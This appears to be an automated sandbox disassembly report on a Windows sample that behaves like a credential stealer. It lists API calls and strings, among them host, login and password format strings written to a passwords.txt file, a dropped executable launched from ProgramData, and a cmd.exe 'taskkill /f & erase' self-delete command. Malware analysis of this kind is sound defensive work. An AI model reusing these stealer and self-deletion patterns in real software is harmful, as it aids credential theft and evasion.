Part of subcall function 00402314: std::_Lockit::_Lockit.LIBCPMT ref: 00402325

std::locale::_Getfacet.LIBCPMT ref: 00451C22
codecvt.LIBCPMT ref: 00451C3C
std::bad_exception::bad_exception.LIBCMT ref: 00451C50
__CxxThrowException@8.LIBCMT ref: 00451C5E
std::locale::facet::_Incref.LIBCPMT ref: 00451C6E
std::locale::facet::_Facet_Register.LIBCPMT ref: 00451C74

Strings

bad cast, xrefs: 00451C48

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_GetfacetH_prolog3IncrefRegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::_
String ID: bad cast
API String ID: 1335069804-3145022300
Opcode ID: 7247765b0d2bcf58f12f1d470b950891f1e7f619b6597079de52321b07085d7a
Instruction ID: 0a30acc73c95a4ed926b01724558645c800098e26a7f2e46e695cd5380567cb4
Opcode Fuzzy Hash: 7247765b0d2bcf58f12f1d470b950891f1e7f619b6597079de52321b07085d7a
Instruction Fuzzy Hash: DE01823184021997CF02FBB1CD46AAEB325AB4472AF20452EFE10772E2CF7C9909875C

Uniqueness

Uniqueness Score: -1.00%

Function 00451D57 Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00451D5E
std::_Lockit::_Lockit.LIBCPMT ref: 00451D68
int.LIBCPMT ref: 00451D7F

Part of subcall function 00402314: std::_Lockit::_Lockit.LIBCPMT ref: 00402325

std::locale::_Getfacet.LIBCPMT ref: 00451D88
numpunct.LIBCPMT ref: 00451DA2
std::bad_exception::bad_exception.LIBCMT ref: 00451DB6
__CxxThrowException@8.LIBCMT ref: 00451DC4
std::locale::facet::_Incref.LIBCPMT ref: 00451DD4
std::locale::facet::_Facet_Register.LIBCPMT ref: 00451DDA

Strings

bad cast, xrefs: 00451DAE

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_GetfacetH_prolog3IncrefRegisterThrownumpunctstd::bad_exception::bad_exceptionstd::locale::_
String ID: bad cast
API String ID: 2348202366-3145022300
Opcode ID: 790356e905dab67dde846a75105c2b1b7770562734e6376f9d551eb9331b7c98
Instruction ID: 36697eebfcb0d64f6fb21faf6a3caef2d43cdbfcbe44bccc73b94be895519c67
Opcode Fuzzy Hash: 790356e905dab67dde846a75105c2b1b7770562734e6376f9d551eb9331b7c98
Instruction Fuzzy Hash: C801823190021497CB05EBB18D82AAE7335AB4072AF20452EFE10771E2DF7CA909D79D

Uniqueness

Uniqueness Score: -1.00%

Function 0040E483 Relevance: 16.2, APIs: 5, Strings: 4, Instructions: 452COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0040E48D

Part of subcall function 00450776: GetUserNameA.ADVAPI32(?,?), ref: 004507AB

Part of subcall function 0045341F: MultiByteToWideChar.KERNEL32(00000000,00000000,00000104,?,00000000,00000000,000003E8,?,00000000,?,?,?,004096C0,00000104,00000104,?), ref: 0045344E
Part of subcall function 0045341F: MultiByteToWideChar.KERNEL32(00000000,00000000,00000104,?,00000000,?,?,00000000,?,?,?,004096C0,00000104,00000104,?,?), ref: 0045347D

Part of subcall function 00401FF9: _memmove.LIBCMT ref: 0040201B

Part of subcall function 0040111F: std::_Xinvalid_argument.LIBCPMT ref: 00401132
Part of subcall function 0040111F: _memmove.LIBCMT ref: 0040116D

_fprintf.LIBCMT ref: 0040E8BC
_fprintf.LIBCMT ref: 0040E907
_fprintf.LIBCMT ref: 0040E946
_fprintf.LIBCMT ref: 0040E965

Strings

Login: %s, xrefs: 0040E93B
Password: %s, xrefs: 0040E95A
files\passwords.txt, xrefs: 0040E60E
Host: %s, xrefs: 0040E8FC

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: _fprintf$ByteCharMultiWide_memmove$H_prolog3_NameUserXinvalid_argumentstd::_
String ID: Host: %s$Login: %s$Password: %s$files\passwords.txt
API String ID: 1373296115-2248325646
Opcode ID: 292304e07268de8022028dd2f6c8ae1ac73672c74041a8935b64ddd32e71a8af
Instruction ID: 433db4eb078d59d92d0baf419809eb4a8fd6e60258cc1fb7528eaf95558ec880
Opcode Fuzzy Hash: 292304e07268de8022028dd2f6c8ae1ac73672c74041a8935b64ddd32e71a8af
Instruction Fuzzy Hash: D7028271C00119AECB15EBA5CC81EEEB778EF55304F1045AEE51AB71E2EB345A48CF68

Uniqueness

Uniqueness Score: -1.00%

Function 0040EA2C Relevance: 16.1, APIs: 5, Strings: 4, Instructions: 313COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0040EA36

Part of subcall function 00450776: GetUserNameA.ADVAPI32(?,?), ref: 004507AB

Part of subcall function 0040E27B: __EH_prolog3.LIBCMT ref: 0040E282

Part of subcall function 00401195: _memmove.LIBCMT ref: 004011B4

Part of subcall function 0040132D: std::_Xinvalid_argument.LIBCPMT ref: 00401347

_fprintf.LIBCMT ref: 0040ECF7
_fprintf.LIBCMT ref: 0040ED11
_fprintf.LIBCMT ref: 0040ED2C
_fprintf.LIBCMT ref: 0040ED47

Part of subcall function 0040111F: std::_Xinvalid_argument.LIBCPMT ref: 00401132
Part of subcall function 0040111F: _memmove.LIBCMT ref: 0040116D

Strings

Login: %s, xrefs: 0040ED26
Password: %s, xrefs: 0040ED41
files\passwords.txt, xrefs: 0040EAE8
Host: %s, xrefs: 0040ED0B

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: _fprintf$Xinvalid_argument_memmovestd::_$H_prolog3H_prolog3_NameUser
String ID: Host: %s$Login: %s$Password: %s$files\passwords.txt
API String ID: 87717484-2248325646
Opcode ID: 13440d0cf464ef70276999bb8882d3e53df7368dc9021e0ad288ec79a9f874a0
Instruction ID: e4a326496427d64c04abd442ac6375be3b923bac0de9e32fa1cde3ce3b288285
Opcode Fuzzy Hash: 13440d0cf464ef70276999bb8882d3e53df7368dc9021e0ad288ec79a9f874a0
Instruction Fuzzy Hash: 81B19E71C00209AEDB14EBA9CC81EEEB778EF15314F10856FE516B71D2EB345A49CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00454DE4 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 176fileCOMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(?,?), ref: 00454E19
GetFileSize.KERNEL32(?,00000000), ref: 00454E93
SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 00454EAF
ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 00454EC3
SetFilePointer.KERNEL32(?,00000024,00000000,00000000), ref: 00454ECC
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 00454EDC
SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00454EFA
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 00454F0A

Strings

, xrefs: 00454E66

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: File$PointerRead$HandleInformationSize
String ID:
API String ID: 2979504256-3916222277
Opcode ID: a80c60cf1a71531df5dea38b2b3faea91d7098dc5bec5eb8f6e15fcfe212b35c
Instruction ID: 5bce632787496c16d38b2fe698086b5f018f65fce6b26c026b1490379197aaf7
Opcode Fuzzy Hash: a80c60cf1a71531df5dea38b2b3faea91d7098dc5bec5eb8f6e15fcfe212b35c
Instruction Fuzzy Hash: D9611771D00218AFDF14DFD9DC85AAEBBB8FB84309F14442AE911EB261D7389D898F54

Uniqueness

Uniqueness Score: -1.00%

Function 00422D40 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 168COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00422EA4

Strings

%lld, xrefs: 00422D79
program, xrefs: 00422DA3
vtab:%p:%p, xrefs: 00422F26
intarray, xrefs: 00422D8D
%.16g, xrefs: 00422DB4
keyinfo(%d, xrefs: 00422E30
collseq(%.20s), xrefs: 00422DFC
%s(%d), xrefs: 00422E1C

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: %.16g$%lld$%s(%d)$collseq(%.20s)$intarray$keyinfo(%d$program$vtab:%p:%p
API String ID: 4104443479-3327101093
Opcode ID: da5149b7a72ed4ee6c1888c3bcff8df7852a9e3095067d464e38f941155ed542
Instruction ID: 701f004d7e4de8af2c429b3ea795cc04203e067bcca20fa66e9065f5e810b663
Opcode Fuzzy Hash: da5149b7a72ed4ee6c1888c3bcff8df7852a9e3095067d464e38f941155ed542
Instruction Fuzzy Hash: 3451FA70600665FFCB188F68DA85E7AB7B0FF40314B65428BF8168B2A1D3BC9D41E759

Uniqueness

Uniqueness Score: -1.00%

Function 0040948C Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 68networkCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00409493
HttpAddRequestHeadersA.WININET(00000004,00000000,00000000,20000000), ref: 004094DA
HttpAddRequestHeadersA.WININET(00000004,00000000,00000000,20000000), ref: 004094FD
HttpAddRequestHeadersA.WININET(00000004,00000000,00000000,20000000), ref: 00409520
HttpAddRequestHeadersA.WININET(00000004,00000000,00000000,20000000), ref: 00409543

Strings

Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 004094DE
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 004094A1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 00409524
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 00409501

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: HeadersHttpRequest$H_prolog3_
String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
API String ID: 1254599795-787135837
Opcode ID: 11abad8f548612c885615f0a4b13a5e91d7d011ec6f832d21cb69c49c6eacea2
Instruction ID: 7e0d07dff61d6f49d3f9a1ee9c18ae542f09413f25d63dadad158ac3da8fbf36
Opcode Fuzzy Hash: 11abad8f548612c885615f0a4b13a5e91d7d011ec6f832d21cb69c49c6eacea2
Instruction Fuzzy Hash: F6213D71D00209AAEB11DBA9CC86FEEBB78EB18700F50C42AF515761D2C7B85904CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004047A8 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 157COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 004047B2

Part of subcall function 004091A3: _memset.LIBCMT ref: 004091B1
Part of subcall function 004091A3: _strcpy_s.LIBCMT ref: 004091C7
Part of subcall function 004091A3: _memset.LIBCMT ref: 004091E2

_strtok.LIBCMT ref: 004047F6
_strtok.LIBCMT ref: 00404961

Part of subcall function 004596EF: __getptd.LIBCMT ref: 0045970D

ShellExecuteA.SHELL32(00000000,00000000,00000000,0047579E,00000000,00000000), ref: 0040493D

Part of subcall function 00401195: _memmove.LIBCMT ref: 004011B4

Part of subcall function 0040922D: _memset.LIBCMT ref: 00409237

Strings

[ZoneTransfer]ZoneId=2, xrefs: 00404899
C:\ProgramData\, xrefs: 0040480B, 00404866, 004048BA, 00404921
:Zone.Identifier, xrefs: 004048C5
.exe, xrefs: 00404821

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: _memset$_strtok$ExecuteH_prolog3_Shell__getptd_memmove_strcpy_s
String ID: .exe$:Zone.Identifier$C:\ProgramData\$[ZoneTransfer]ZoneId=2
API String ID: 2759586629-1582942023
Opcode ID: 7793ab1c7f140ecfc5f9dd9e97ddf7f26b647cd90f26331978fadb3331caf76c
Instruction ID: 80f19a736bad6d2859fbb885d1806499e60b760684ade25c54516fd153495b3e
Opcode Fuzzy Hash: 7793ab1c7f140ecfc5f9dd9e97ddf7f26b647cd90f26331978fadb3331caf76c
Instruction Fuzzy Hash: 24512FB1800249AEDB15EBA5CC56FEE77789F15308F0040ABF609BA1C2DB785F48CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0045060E Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 121libraryloaderCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00450627
GetModuleHandleA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,00000010), ref: 0045065A
GetProcAddress.KERNEL32(00000000), ref: 00450661
_memset.LIBCMT ref: 00450675

Part of subcall function 00453394: __EH_prolog3_GS.LIBCMT ref: 0045339E

Part of subcall function 00404147: _memmove.LIBCMT ref: 00404169

Part of subcall function 00401195: _memmove.LIBCMT ref: 004011B4

GlobalMemoryStatus.KERNEL32 ref: 00450701

Strings

MB, xrefs: 004506A9, 0045071A
GlobalMemoryStatusEx, xrefs: 00450649
kernel32.dll, xrefs: 0045064F

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: _memmove$AddressGlobalH_prolog3H_prolog3_HandleMemoryModuleProcStatus_memset
String ID: MB$GlobalMemoryStatusEx$kernel32.dll
API String ID: 1919256930-2756951423
Opcode ID: b9a9422dadfdb6fbf4e6032fe6b3c611c78ce9e42a828d79e00e9df8fd40fe7f
Instruction ID: fcc91ab740b708f1d81ca89bc5825e4fd0c7c57fe69f3e3d35f6773e5caac7fc
Opcode Fuzzy Hash: b9a9422dadfdb6fbf4e6032fe6b3c611c78ce9e42a828d79e00e9df8fd40fe7f
Instruction Fuzzy Hash: 194154B1900248EFDB15EF95CC45BEE77ACAB58304F10452FFA0AB7281DB789608CB65

Uniqueness

Uniqueness Score: -1.00%

Function 004531CA Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 88COMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 004531D4
GetCurrentProcessId.KERNEL32(000000B4,00407BA3), ref: 004531E6

Part of subcall function 00452914: OpenProcess.KERNEL32(00000410,00000000,?), ref: 0045293F
Part of subcall function 00452914: GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 00452959
Part of subcall function 00452914: CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104), ref: 0045295F

GetCurrentProcessId.KERNEL32 ref: 00453201

Part of subcall function 004530E8: __EH_prolog3_catch.LIBCMT ref: 00453107
Part of subcall function 004530E8: _memset.LIBCMT ref: 00453139
Part of subcall function 004530E8: OpenProcess.KERNEL32(00000410,00000000,?,?,?,0000000C), ref: 0045314B
Part of subcall function 004530E8: EnumProcessModules.PSAPI(00000000,?,00000004,00000010,?,?,0000000C), ref: 00453162
Part of subcall function 004530E8: GetModuleBaseNameA.PSAPI(00000000,?,00000000,00000104,00000000,?,00000004,00000010,?,?,0000000C), ref: 00453178
Part of subcall function 004530E8: CloseHandle.KERNEL32(00000000,?,?,0000000C), ref: 0045317E

Part of subcall function 00401195: _memmove.LIBCMT ref: 004011B4

ShellExecuteA.SHELL32(00000000,00000000,C:\Windows\System32\cmd.exe,?,00000000,00000000), ref: 004532C2

Strings

& exit, xrefs: 00453258
/f & erase , xrefs: 00453228
/c taskkill /im , xrefs: 00453216
C:\Windows\System32\cmd.exe, xrefs: 004532BB

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: Process$CloseCurrentHandleModuleNameOpen$BaseEnumExecuteFileH_prolog3_catchH_prolog3_catch_ModulesShell_memmove_memset
String ID: & exit$ /f & erase $/c taskkill /im $C:\Windows\System32\cmd.exe
API String ID: 1336415164-3915403857
Opcode ID: 156276488b81b3be011d34789bb102ca04efcd1908e0cf18c530b1488031bf5d
Instruction ID: e2707bc370dbeb9f63087c9951a0f0c4036ed314ff5461f4f5b746d47213f062
Opcode Fuzzy Hash: 156276488b81b3be011d34789bb102ca04efcd1908e0cf18c530b1488031bf5d
Instruction Fuzzy Hash: AE2143B1901158BADB15E792DC45FDF7B7CAF99704F0440AFB509B6182DA381708CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0041CDFD Relevance: 13.6, APIs: 9, Instructions: 130filesleepCOMMON

Download Yara Rule

APIs

LockFile.KERNEL32(?,00000000,00000001,00000000), ref: 0041CE56
Sleep.KERNEL32(00000001), ref: 0041CE60
GetLastError.KERNEL32 ref: 0041CE72
UnlockFile.KERNEL32(?,00000000,00000001,00000000), ref: 0041CF51

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: File$ErrorLastLockSleepUnlock
String ID:
API String ID: 3015003838-0
Opcode ID: aa8f927945eea1f2d94e4f590fa6f185717e81fc96b7cc399b52a082660638c5
Instruction ID: b06553b1d98a0e3ea25144e6dfb9a9a71f607b00552f265c0ec4e31a9e05c160
Opcode Fuzzy Hash: aa8f927945eea1f2d94e4f590fa6f185717e81fc96b7cc399b52a082660638c5
Instruction Fuzzy Hash: DB41C271184702AFD7208F14DD85BBBB7E6EBC4B14F10092EF69692290D779C8868B5E

Uniqueness

Uniqueness Score: -1.00%

Function 004162ED Relevance: 13.6, APIs: 9, Instructions: 67sleepfileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000,00000000,00000000,00000080,0048BEF8,0041D080,004341A1,?,00000000,00000000,00000000,?,004341A1), ref: 00416317
GetFileAttributesW.KERNEL32(00000000), ref: 0041631E
GetLastError.KERNEL32 ref: 0041632B
Sleep.KERNEL32(00000064), ref: 00416340
DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,0048BEF8,0041D080,004341A1,?,00000000,00000000,00000000,?,004341A1), ref: 00416349
GetFileAttributesA.KERNEL32(00000000), ref: 00416350
GetLastError.KERNEL32 ref: 0041635D
Sleep.KERNEL32(00000064), ref: 00416372
_free.LIBCMT ref: 0041637B

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: File$AttributesDeleteErrorLastSleep$_free
String ID:
API String ID: 1514026686-0
Opcode ID: 9544f8d00b5aa117cf4b90fb4dbd111ae79141ae8a037b8a76f0756ffa0e497b
Instruction ID: 32506be1ad8113bddfc8ee46fee1a4250b11468f7ae25e8e45c7b09250ce7224
Opcode Fuzzy Hash: 9544f8d00b5aa117cf4b90fb4dbd111ae79141ae8a037b8a76f0756ffa0e497b
Instruction Fuzzy Hash: 5A11C2355443189BC6203BB4AD8C6FE7664E7A6735B23022AEE37952D0DB2D88C2951E

Uniqueness

Uniqueness Score: -1.00%

Function 00450E7B Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 309processCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 00450E85

Part of subcall function 0040C28E: __EH_prolog3.LIBCMT ref: 0040C295

Part of subcall function 00401195: _memmove.LIBCMT ref: 004011B4

Part of subcall function 004013C6: _memmove.LIBCMT ref: 00401417

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00450F16
Process32First.KERNEL32(00000000,00000128), ref: 00450F29
Process32Next.KERNEL32 ref: 00450F49

Part of subcall function 0040B5F1: __EH_prolog3_catch.LIBCMT ref: 0040B5F8

Part of subcall function 0040B7A8: __EH_prolog3_catch.LIBCMT ref: 0040B7AF

CloseHandle.KERNEL32(?,00000000,00000128,00000002,00000000,----------,0000000A,00000001,00000000,?,00000003,00000001,0047579E,00000000,00000294,00407464), ref: 0045122E

Strings

----------, xrefs: 00450EE5
---------- , xrefs: 00450FBA, 004510AA

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: H_prolog3_catchProcess32_memmove$CloseCreateFirstH_prolog3H_prolog3_catch_HandleNextSnapshotToolhelp32
String ID: ----------$----------
API String ID: 4185073159-2385812570
Opcode ID: 72637d6615cac81286fc10a19f6dc649770b12c5915a696c779ced15ea2d5362
Instruction ID: ec1d58d1487a44b3ec73f87164903becd6bd139376c811ea031d7f04e2411c97
Opcode Fuzzy Hash: 72637d6615cac81286fc10a19f6dc649770b12c5915a696c779ced15ea2d5362
Instruction Fuzzy Hash: 90B184B1800258AEDB15EB51DC85FEEB7BCAB15308F1041EFF509B7182DA781B48CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00442078 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 261COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004420DF

Strings

statement aborts at %d: [%s] %s, xrefs: 00441386
cannot open savepoint - SQL statements in progress, xrefs: 00442097
cannot %s savepoint - SQL statements in progress, xrefs: 004422FC
rollback, xrefs: 004422EF
no such savepoint: %s, xrefs: 0044216E
release, xrefs: 004422F6, 004422FB

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: cannot %s savepoint - SQL statements in progress$cannot open savepoint - SQL statements in progress$no such savepoint: %s$release$rollback$statement aborts at %d: [%s] %s
API String ID: 4104443479-1896108220
Opcode ID: f137cee0beeea66ad57906b7b086e83a95a1671ae42d327fd320018e413664d5
Instruction ID: 797d79923b267f7fccb2a893f8ff8240b5bceaafbc2e04f88c89551706c4e020
Opcode Fuzzy Hash: f137cee0beeea66ad57906b7b086e83a95a1671ae42d327fd320018e413664d5
Instruction Fuzzy Hash: 59B16E70A00344DFEB14DFA4D981AADB7B1BF48304F15416FE809AB352D7B8A886CF59

Uniqueness

Uniqueness Score: -1.00%

Function 004530E8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00453107
_memset.LIBCMT ref: 00453139
OpenProcess.KERNEL32(00000410,00000000,?,?,?,0000000C), ref: 0045314B
EnumProcessModules.PSAPI(00000000,?,00000004,00000010,?,?,0000000C), ref: 00453162
GetModuleBaseNameA.PSAPI(00000000,?,00000000,00000104,00000000,?,00000004,00000010,?,?,0000000C), ref: 00453178
CloseHandle.KERNEL32(00000000,?,?,0000000C), ref: 0045317E

Strings

<unknown>, xrefs: 00453120

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: Process$BaseCloseEnumH_prolog3_catchHandleModuleModulesNameOpen_memset
String ID: <unknown>
API String ID: 3374446145-1574992787
Opcode ID: 4af4c1d636ed53bf92c689ee4a81c7c380f4e4d0fcf904d16474ef63cb257fed
Instruction ID: 36675c83a84a4f6911bf26c98de6c59d982f1393f1b9368f40bb084a1230a726
Opcode Fuzzy Hash: 4af4c1d636ed53bf92c689ee4a81c7c380f4e4d0fcf904d16474ef63cb257fed
Instruction Fuzzy Hash: 0D213375904248ABDB11EF54DD41BEE77A8FF08745F40403AFE08EB282DB749A08C7A9

Uniqueness
